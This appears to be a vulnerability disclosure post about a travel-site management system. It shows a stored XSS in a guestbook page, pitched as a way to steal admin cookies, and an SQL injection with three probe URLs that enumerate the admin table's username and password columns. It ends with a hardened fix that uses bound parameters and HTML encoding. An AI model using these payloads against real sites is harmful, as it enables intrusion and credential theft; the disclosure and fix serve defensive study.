Yunan Travel Website (雨楠旅游网) Service Management System v2013.6.11: latest 0day vulnerabilities

Vulnerability 1
Type: stored XSS
File: LstBook.Asp
Code:
[code]
If action="addbook" Then
    If Trim(Request("xm"))="" Then
        Call alert("姓名不能为空","-1")
    End If
    If Trim(Request("sj"))="" Then
        Call alert("手机不能为空","-1")
    End If
    If Trim(Request("dz"))="" Then
        Call alert("地址不能为空","-1")
    End If
    Set oRs=server.createobject("adodb.recordset")
    sSql="Select * from [LstBook]"
    oRs.open sSql,oconn,1,3
    oRs.addnew
    ' every field is written to the database exactly as received from the request
    oRs("xm")=Trim(Request("xm"))
    oRs("sj")=Trim(Request("sj"))
    oRs("dz")=Trim(Request("dz"))
    oRs("qq")=Trim(Request("qq"))
    oRs("email")=Trim(Request("email"))
    oRs("ly")=Trim(Request("ly"))
    oRs("time")=now()
    oRs("state")=0
    oRs.update
    oRs.close
    Call Alert("您的留言提交成功,我们将尽快给您解答。","/lstbook.asp")
    Set oRs = Nothing
End If
[/code]
Exploitation notes: the code above only runs the input through Trim, which strips whitespace and nothing else, so..... heh. This XSS can be used to capture cookies and get into the admin backend!

Vulnerability 2
Type: SQL injection
File: LstInfo.asp
Code:
[code]
<%
If Id="" Then
    Call alert("参数错误,返回首页.","/")
End If
' this page
' Id is concatenated straight into the SQL string
Set v= oConn.Execute("SELECT top 1 * FROM [LstJob] where Id ="&Id)
If v.bof And v.eof Then
    Call BackUrl("/")
End If
oConn.Execute("UPDATE [LstJob] SET Jobhits = Jobhits +1 where Id ="&Id)
%>
[/code]
Code notes: the Id variable lives in the "" file, and in conn.asp Id is read with Request, so the problem is obvious.
PS: three basic test statements are listed below; work out the rest yourself!
/LstJobInfo.asp?TT=&SS=&Id=1 and exists(select * from lstadmin)
/LstJobInfo.asp?TT=&SS=&Id=1 and exists(select usradmin from lstadmin)
/LstJobInfo.asp?TT=&SS=&Id=1 and exists(select usrpass from lstadmin)
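Added example (my code, not the vendor's): hardened versions of the two code paths above in classic ASP. It assumes oConn is the open ADODB.Connection from conn.asp and that alert() and BackUrl() end the response, as the original code relies on.

```asp
<%
' Added example, not part of the original page or the vendor's code.
' Assumes oConn (open ADODB.Connection), alert() and BackUrl() exist as in conn.asp.
Const adInteger = 3
Const adParamInput = 1
Const adCmdText = 1

' --- LstInfo.asp: read Id from the query string as an integer, then bind it ---
Dim Id, cmd, v
Id = Trim(Request.QueryString("Id"))
If Id = "" Or Not IsNumeric(Id) Or Len(Id) > 9 Then
    Call alert("参数错误,返回首页.", "/")   ' rejects "1 and exists(...)" and friends
End If
Id = CLng(Id)

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = oConn
cmd.CommandType = adCmdText
' the "?" placeholder is filled by the provider; the value is never part of the SQL text
cmd.CommandText = "SELECT TOP 1 * FROM [LstJob] WHERE Id = ?"
cmd.Parameters.Append cmd.CreateParameter("Id", adInteger, adParamInput, , Id)
Set v = cmd.Execute
If v.BOF And v.EOF Then
    Call BackUrl("/")
End If

' same bound parameter is reused for the hit counter update
cmd.CommandText = "UPDATE [LstJob] SET Jobhits = Jobhits + 1 WHERE Id = ?"
cmd.Execute

' --- LstBook.asp: stored guestbook fields are untrusted data, encode them on output ---
' (the "" & ... coerces Null to an empty string; HTMLEncode fails on Null)
Response.Write "<td>" & Server.HTMLEncode("" & oRs("xm")) & "</td>"
Response.Write "<td>" & Server.HTMLEncode("" & oRs("ly")) & "</td>"
%>
```

Server.HTMLEncode turns <script> into &lt;script&gt; so a stored payload renders as text instead of executing in the admin's browser; the Trim() calls in the original can stay, they just were never a filter.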
